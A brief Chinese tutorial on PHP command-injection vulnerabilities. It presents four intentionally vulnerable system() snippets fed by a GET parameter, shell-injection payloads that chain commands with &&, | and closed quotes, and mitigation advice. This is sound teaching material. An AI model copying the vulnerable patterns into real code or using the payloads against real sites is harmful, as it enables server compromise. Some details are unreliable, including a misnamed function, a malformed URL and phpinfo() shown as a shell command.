命令成因
脚本语言有点事简洁,方便,但也伴随一些问题,比如运行速度慢,无法接触系统底层,如果我们开发的应用(特别是企业级的一些应用)需要除去web的特殊功能时,就需要调用一些外部程序。在应用需要去调用外部程序去处理的情况下,就会用到一些执行系统命令的函数。如php中的system,exec,shell_exec等,当用户可以控制命令执行的函数时,可以恶意注入系统命令到正常命令中,造成命令执行
在PHP中可以调用外部程序的主要有以下函数
1.system
2.exec
3.shell_exec
4.passthru
5.popen
6.proc_popen
命令执行漏洞的利用
1.system()函数的示例一、可控点为待执行程序
源代码:
<?php
$arg=$_GET['cmd'];
if($arg)
{
system("$arg");
}
?>
直接在可控点输入命令即可 例:
?cmd=id
?cmd=pwd
?cmd=ifconfig
1.system()函数的示例一二、可控点是传入程序的整个参数
<?php
$arg=$_GET['cmd'];
if($arg)
{
system("ping -c 3 $arg");
}
?>
可控电视程序的整个参数,我们可以用管道命令来执行其他命令例如&& 或者|
例:
127.0.0.1 && phpinfo()
system()函数实例三:可控点是传入程序的某个参数,有双引号包裹
<?php
$arg=$_GET['cmd'];
if($arg)
{
system("ls -al \"$arg\"");
}
代码的利用
?cmd=/home" | ifconfig;"
system()函数示例四:可控点是传入程序的某个参数的值,被单引号包裹
<?php
$arg=$_GET['cmd'];
if($arg)
{
system("ls -al '$arg'");
}
在单引号内传入的数据会被当作一个字符串处理,所以要先将单引号闭合
/cmd?=/home' | ifconfig'
命令执行漏洞的修复方案
1.能使用脚本解决的工作,不要调用其它程序处理。尽量少用执行命令的函数,并在disable_functions中将其禁用。
2.对于可控点是程序参数的情况,使用escapeshellcmd函数进行过滤。
3.对于可控点是参数值的情况,使用escapeshellarg函数进行过滤。
4.参数值尽量使用单引号包裹,并在接入前使用addslashes进行转义。